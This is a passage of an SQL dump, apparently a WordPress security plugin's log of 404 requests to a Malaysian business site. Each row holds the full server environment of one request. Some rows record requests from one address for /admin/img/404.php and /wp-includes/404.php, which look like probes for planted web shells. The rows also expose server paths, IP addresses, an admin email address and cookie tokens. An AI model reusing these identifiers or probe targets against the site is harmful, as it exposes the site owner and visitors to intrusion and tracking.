07:11:14',34320568,36125136,'https://bintara.com.my/toughbook-54/',1,0,'207.46.13.212'),(28047,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"470-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"31E291F3-4D06-40EC-84C6-4584CE254572\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"470-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaVqO7FwawgmiJ6SUM28QQAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.243\";s:11:\"REMOTE_PORT\";s:5:\"55487\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaVqO7FwawgmiJ6SUM28QQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571121723.4524\";s:12:\"REQUEST_TIME\";s:10:\"1571121723\";}}','notice','2019-10-15 06:42:07','2019-10-15 06:42:04',35347824,37150632,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.243'),(28046,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:72:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/admin/img/404.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=46e5a2cfa40ea2bddb896d4d09e64342\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:40:\"http://bintara.com.my//admin/img/404.php\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/admin/img/404.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/admin/img/404.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaVa2G8LgiH97JG7BfnRsAAAAAE\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/admin/img/404.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/admin/img/404.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaVa2G8LgiH97JG7BfnRsAAAAAE\";s:38:\"REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:47:\"REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/admin/img/404.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/admin/img/404.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaVa2G8LgiH97JG7BfnRsAAAAAE\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/admin/img/404.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/admin/img/404.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaVa2G8LgiH97JG7BfnRsAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"117.83.180.8\";s:11:\"REMOTE_PORT\";s:5:\"50338\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/admin/img/404.php\";s:10:\"SCRIPT_URL\";s:18:\"/admin/img/404.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaVa2G8LgiH97JG7BfnRsAAAAAE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571117784.799\";s:12:\"REQUEST_TIME\";s:10:\"1571117784\";}}','notice','2019-10-15 05:36:27','2019-10-15 05:36:25',35053856,36862520,'https://bintara.com.my/admin/img/404.php',1,0,'117.83.180.8'),(28045,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/wp-includes/404.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=38a2881fad38af9c729075ca5257632f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:42:\"http://bintara.com.my//wp-includes/404.php\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-includes/404.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/wp-includes/404.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaVawMlTSMr1FladyDvMSwAAAQE\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-includes/404.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/wp-includes/404.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaVawMlTSMr1FladyDvMSwAAAQE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"117.83.180.8\";s:11:\"REMOTE_PORT\";s:5:\"49577\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-includes/404.php\";s:10:\"SCRIPT_URL\";s:20:\"/wp-includes/404.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaVawMlTSMr1FladyDvMSwAAAQE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571117760.2122\";s:12:\"REQUEST_TIME\";s:10:\"1571117760\";}}','notice','2019-10-15 05:36:02','2019-10-15 05:36:00',35032432,36828152,'https://bintara.com.my/wp-includes/404.php',1,0,'117.83.180.8'),(28044,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/service-title-6/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-6/\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/service-title-6/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaVFoG8LgiH97JG7BfnAGwAAAA0\";s:12:\"REDIRECT_URL\";s:17:\"/service-title-6/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.148.218\";s:11:\"REMOTE_PORT\";s:5:\"18842\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-6/\";s:10:\"SCRIPT_URL\";s:17:\"/service-title-6/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaVFoG8LgiH97JG7BfnAGwAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571112352.6358\";s:12:\"REQUEST_TIME\";s:10:\"1571112352\";}}','notice','2019-10-15 04:05:54','2019-10-15 04:05:53',35025560,36827784,'https://bintara.com.my/service-title-6/',1,0,'54.36.148.218'),(28043,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/18-2__trashed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaU6oLFwawgmiJ6SUM2ySwAAAcE\";s:12:\"REDIRECT_URL\";s:15:\"/18-2__trashed/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.199\";s:11:\"REMOTE_PORT\";s:5:\"15576\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:10:\"SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaU6oLFwawgmiJ6SUM2ySwAAAcE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571109536.2591\";s:12:\"REQUEST_TIME\";s:10:\"1571109536\";}}','notice','2019-10-15 03:18:57','2019-10-15 03:18:56',33915088,35721352,'https://bintara.com.my/18-2__trashed/',1,0,'157.55.39.199'),(28042,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"CAFFC268-68A9-4F91-90A9-B1A10EC42EDA\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaUzB28LgiH97JG7BfmxuwAAAAc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.243\";s:11:\"REMOTE_PORT\";s:5:\"50297\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaUzB28LgiH97JG7BfmxuwAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571107592.0502\";s:12:\"REQUEST_TIME\";s:10:\"1571107592\";}}','notice','2019-10-15 02:46:33','2019-10-15 02:46:32',35343712,37149696,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.243'),(28040,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"51178\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaUesslTSMr1FladyDvBJQAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571102386.4463\";s:12:\"REQUEST_TIME\";s:10:\"1571102386\";}}','notice','2019-10-15 01:19:49','2019-10-15 01:19:46',35426392,37231848,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28041,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"390-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft 